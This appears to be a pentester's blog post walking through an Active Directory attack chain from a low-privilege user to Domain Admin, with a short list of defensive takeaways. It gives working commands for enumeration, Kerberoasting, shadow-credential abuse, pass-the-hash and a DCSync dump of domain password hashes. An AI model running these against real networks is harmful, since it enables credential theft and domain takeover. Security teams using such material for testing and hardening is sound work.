Why AD Is Still the Favourite Target
Every enterprise AD environment I've tested has had at least one viable path from a standard domain user to Domain Admin. The technology is complex, delegation is confusing, and ACL misconfigurations accumulate for years without anyone noticing.
Enumeration First
# BloodHound collection
bloodhound-python -u lowpriv -p 'Password1!' -d corp.local -c All --zip
# PowerView (from a Windows foothold)
Get-DomainUser -SPN | Select samaccountname,serviceprincipalname
Kerberoasting
Any domain user can request a TGS for any SPN. If the service account uses a weak password, offline cracking gives you its credentials:
GetUserSPNs.py corp.local/lowpriv:'Password1!' -dc-ip 10.10.10.10 -request
hashcat -m 13100 spn_hashes.txt rockyou.txt
ACL Abuse: GenericWrite
BloodHound will show you if your user has GenericWrite over another user:
python3 pywhisker.py -d corp.local -u lowpriv -p 'Password1!' \
--target svcadmin --action add
Pass-the-Hash and Lateral Movement
evil-winrm -i 10.10.10.20 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:hash
DCSync
With DS-Replication-Get-Changes-All rights:
secretsdump.py corp.local/svcadmin@dc01 -just-dc-ntds
Defensive Takeaways
- Run BloodHound against your own environment quarterly; fix Shortest Paths to DA
- Audit service accounts — no domain user should have an SPN and a weak password
- Enable Protected Users group for all privileged accounts
- Alert on 4769 (TGS requests) for sensitive service accounts
Keep going
Get the next writeup in your inbox
New posts delivered when I publish. No spam.